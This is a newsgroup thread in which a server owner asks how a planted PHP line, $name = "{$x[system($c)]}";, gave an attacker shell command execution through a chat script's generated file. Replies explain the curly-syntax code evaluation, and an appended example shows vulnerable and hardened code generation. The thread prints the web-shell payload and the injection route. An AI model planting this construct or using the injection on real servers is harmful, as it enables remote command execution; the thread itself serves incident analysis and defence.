
Hacked with system()

Hello,

our server got hacked through a security hole in an open source php
chat script.
(nothing new so far, ok!)

This chat script allowed the user to create a new php script on our
server, with the following content: (the code between the two "..."
from the hacker):

<?
$name = "{$x[system($c)]}";
// some more lines omitted ...
?>

save these lines as e.g. /sys.php and call it with your browser:
http://localhost/sys.php?c=ls
and you can execute any system command and see the results!

But: How does it work? The content of a variable being executed and
written to the browser?
If it were just "system($c)" then I understood.
I couldn't find anything about this on the web (didn't know how to
specify the search to get useful results). Can anybody explain what
happens?

Thanks and best regards,
Ingo

Sep 5 '06 #1
Oski wrote:
our server got hacked through a security hole in an open source php
chat script.
(nothing new so far, ok!)

This chat script allowed the user to create a new php script on our
server, with the following content: (the code between the two "..."
from the hacker):

<?
$name = "{$x[system($c)]}";
// some more lines omitted ...
?>

save these lines as e.g. /sys.php and call it with your browser:
http://localhost/sys.php?c=ls
and you can execute any system command and see the results!

But: How does it work? The content of a variable being executed and
written to the browser?
If it were just "system($c)" then I understood.
If you write
$a = "{$x['key']}";

then $a gets the value $x['key'] as expected.

$a = $x[system($c)];

then $a gets the element of the array $x corresponding to the return
value of system($c) (and as a side-effect, system($c) has been called).

It seems like combining these two features allows you to execute code
within a double-quoted string, merely by referencing the string literal.

I'm not sure if this is an intentional feature or not, hence whether
it's a security hole or not. At the very least I think it deserves more
emphasis in the manual page about quoted strings. Nothing I can see in
the manual page mentions that arbitrary code could be executed.

Tim
Sep 5 '06 #2
Tim Martin wrote:
Oski wrote:
our server got hacked through a security hole in an open source php
chat script.
(nothing new so far, ok!)

This chat script allowed the user to create a new php script on our
server, with the following content: (the code between the two "..."
from the hacker):

<?
$name = "{$x[system($c)]}";
// some more lines omitted ...
?>

save these lines as e.g. /sys.php and call it with your browser:
http://localhost/sys.php?c=ls
and you can execute any system command and see the results!

But: How does it work? The content of a variable being executed and
written to the browser?
If it were just "system($c)" then I understood.

If you write
$a = "{$x['key']}";

then $a gets the value $x['key'] as expected.

$a = $x[system($c)];

then $a gets the element of the array $x corresponding to the return
value of system($c) (and as a side-effect, system($c) has been called).

It seems like combining these two features allows you to execute code
within a double-quoted string, merely by referencing the string literal.

I'm not sure if this is an intentional feature or not, hence whether
it's a security hole or not. At the very least I think it deserves more
emphasis in the manual page about quoted strings. Nothing I can see in
the manual page mentions that arbitrary code could be executed.
Following up to myself, I should note that this is not as big an issue
as it seems on the surface - it only matters if the malicious user
writes the string literal itself. If they control a variable that is
substituted into the string literal, it isn't a problem. e.g.

$intermediate = "system($c)"; // Set by malicious user from a form input
// or some other non-string-literal

$a = "{$x[$intermediate]}"; // This code written by you, not under the
// control of the malicious user

is fine.

Tim
Sep 5 '06 #3
In article <11**********************@m79g2000cwm.googlegroups.com>,
"Oski" <os**@gmx.de> wrote:
Hello,

our server got hacked through a security hole in an open source php
chat script.
(nothing new so far, ok!)

This chat script allowed the user to create a new php script on our
server, with the following content: (the code between the two "..."
from the hacker):

<?
$name = "{$x[system($c)]}";
// some more lines omitted ...
?>

save these lines as e.g. /sys.php and call it with your browser:
http://localhost/sys.php?c=ls
and you can execute any system command and see the results!

But: How does it work? The content of a variable being executed and
written to the browser?
If it were just "system($c)" then I understood.
Well, it's odd. system() returns the last line of output if
successful. But in this case, $name is set to the value of $x where
the key is the last line of the output. Is there any $x declaration in
the script?

For instance, this:

<?
$x["var"] = "foobar";
$c = "ls";
$name = "{$x[system($c)]}";
print "Value: $name";
?>

Outputs, after a long list of directories in my root directory (where
'var' is the last):

Value: foobar

So, "var" is the last directory in the ls listing. And the value of
$x["var"] is "foobar", which is assigned to $name.

Why? I have no idea. I'd have to see the entire script for that.
--
Sandman[.net]
Sep 5 '06 #4
our server got hacked through a security hole in an open source php
chat script.
Which one?

Regards,
Talthen
Sep 5 '06 #5
Sandman wrote:
Why? I have no idea. I'd have to see the entire script for that.
There is no more script, no more than what was posted by me! The other
lines (mentioned as omitted) are only other declarations of scalar
variables. If you omit these, the effect is quite the same.

Btw, I'll not disclose which script is vulnerable (at least not now).
I consider contacting the authors first - if this thread turns out to
be a real security hole ...

Ingo.

Sep 5 '06 #6
In article <11*********************@m73g2000cwd.googlegroups.com>,
"Oski" <os**@gmx.de> wrote:
Sandman wrote:
Why? I have no idea. I'd have to see the entire script for that.

There is no more script, no more than what was posted by me! The other
lines (mentioned as omitted) are only other declarations of scalar
variables. If you omit these, the effect is quite the same.

Btw, I'll not disclose which script is vulnerable (at least not now).
I consider contacting the authors first - if this thread turns out to
be a real security hole ...
Then I suppose the script, as seen, was a small part of a larger
"hack" library, which the author cut'n'pasted from.

I've been "hacked" this way also, so I've seen some of these scripts.

--
Sandman[.net]
Sep 5 '06 #7
Oski wrote:
This chat script allowed the user to create a new php script on our
server, [snip]
Surely this is the security hole rather than the script created.
Allowing anyone to write php code that will run on your server is a
Really Bad Idea (tm).

Robin
Sep 5 '06 #8
Sandman wrote:
Then I suppose the script, as seen, was a small part of a larger
"hack" library, which the author cut'n'pasted from.

I've been "hacked" this way also, so I've seen some of these scripts.
In this case, the chat script asks for your name and email when
registering.
Then, it creates a php-script (as described in my first post) and
creates lines within it:
$name = "<userinput>";
$email = "<userinput_2>";
// and so on ...
So you just have to know where this php script is created/saved and
register with a tampered name and then call this php script with the
desired URL + encoded command strings, like "?c=ls%20-l" etc.

Of course, the real (huuuge!) security hole is creating a php script
with unchecked userinput. (I don't dare to guess what might happen if
you have disabled magic_quotes).

But I could not explain the behaviour of PHP as well, especially as
there is nothing documented about this "feature" to execute code within
a variable assignment.

Ingo

Sep 5 '06 #9
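Tim's explanation in #3 (the index inside "{$x[...]}" is an ordinary PHP expression) and the generator pattern Ingo describes in #9 (a script that writes $name = "<userinput>"; into a new .php file), shown together as an added PHP example that is not from the thread. The function names and the JSON variant are my own; strlen() stands in for the function call in the original payload.

```php
<?php
// Added example, not from the thread. Part 1 shows the mechanism: inside
// the curly ("complex") string syntax the array index is parsed as code,
// so a function call placed there runs when the literal is evaluated.
$x = [3 => 'three letters'];
$name = "{$x[strlen('abc')]}";   // strlen('abc') is evaluated right here
var_dump($name);                 // string(13) "three letters"

// Part 2: the generator pattern from post #9 (hypothetical function names).
// $input is whatever the registration form sent as the user's name.

// Vulnerable: raw input is pasted into a double-quoted literal, so a name
// of the form {$x[...]} becomes code as soon as the generated file is
// included. Note that this payload contains no quotes or backslashes,
// so magic_quotes_gpc / addslashes() would not have stopped it.
function generate_vulnerable(string $input): string
{
    return "<?php\n\$name = \"$input\";\n";
}

// Hardened: var_export() emits a single-quoted PHP literal with ' and \
// escaped, and single-quoted strings are never interpolated, so the
// braces, the $ and the parentheses stay plain characters.
function generate_safe(string $input): string
{
    return "<?php\n\$name = " . var_export($input, true) . ";\n";
}

// Better still: do not generate code from user data at all. Store the
// registration as data and read it back at runtime.
function store_registration(string $path, array $data): void
{
    file_put_contents($path, json_encode($data, JSON_THROW_ON_ERROR));
}

// Constructed registration input shaped like the thread's payload, with
// a harmless function in the index.
$input = '{$x[strlen(\'abc\')]}';

echo generate_vulnerable($input);
// <?php
// $name = "{$x[strlen('abc')]}";      <- the index expression will execute

echo generate_safe($input);
// <?php
// $name = '{$x[strlen(\'abc\')]}';    <- plain text, nothing executes
```

The same reasoning applies to any value written into a double-quoted literal of a generated file: if the attacker controls the literal itself, escaping quotes is not enough, because the curly syntax needs none.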
